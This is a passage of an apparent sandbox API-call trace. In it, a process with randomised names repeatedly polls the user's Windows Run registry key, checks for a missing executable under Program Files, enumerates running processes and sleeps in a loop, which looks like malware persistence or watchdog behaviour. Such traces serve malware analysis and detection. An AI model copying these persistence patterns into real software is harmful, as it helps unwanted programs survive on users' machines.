CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0289.841] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0289.841] NtClose (Handle=0x338) returned 0x0 [0289.842] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0289.842] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0289.842] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0289.842] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0289.842] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0289.842] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0289.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0289.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0289.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0289.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0289.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0289.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0289.978] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0289.980] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0289.981] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0289.981] NtClose (Handle=0x338) returned 0x0 [0289.981] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0289.982] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0289.982] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5dde20) returned 1 [0289.982] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0289.982] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0289.982] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0289.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0289.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0289.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0289.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0289.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0290.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0290.100] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0290.102] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0290.102] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0290.102] NtClose (Handle=0x338) returned 0x0 [0290.102] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0290.103] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0290.103] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0290.103] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0290.103] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0290.103] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0290.103] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0290.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0290.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0290.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0290.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0290.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0290.223] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0290.225] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0290.227] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0290.227] NtClose (Handle=0x338) returned 0x0 [0290.227] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0290.227] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0290.227] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0290.227] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0290.227] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0290.227] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0290.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0290.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0290.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0290.230] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0290.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0290.352] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0290.353] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0290.355] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0290.356] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0290.356] NtClose (Handle=0x338) returned 0x0 [0290.356] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0290.356] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0290.356] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0290.356] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0290.356] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0290.356] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0290.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0290.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0290.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0290.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0290.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0290.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0290.466] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0290.468] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0290.468] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0290.468] NtClose (Handle=0x338) returned 0x0 [0290.468] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0290.468] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0290.469] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de4a0) returned 1 [0290.469] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0290.469] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0290.469] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de1a0) returned 1 [0290.469] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0290.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0290.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0290.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0290.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0290.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0290.582] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0290.584] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0290.585] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0290.585] NtClose (Handle=0x338) returned 0x0 [0290.586] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0290.586] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0290.586] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de420) returned 1 [0290.586] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0290.586] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0290.586] RtlFreeHeap 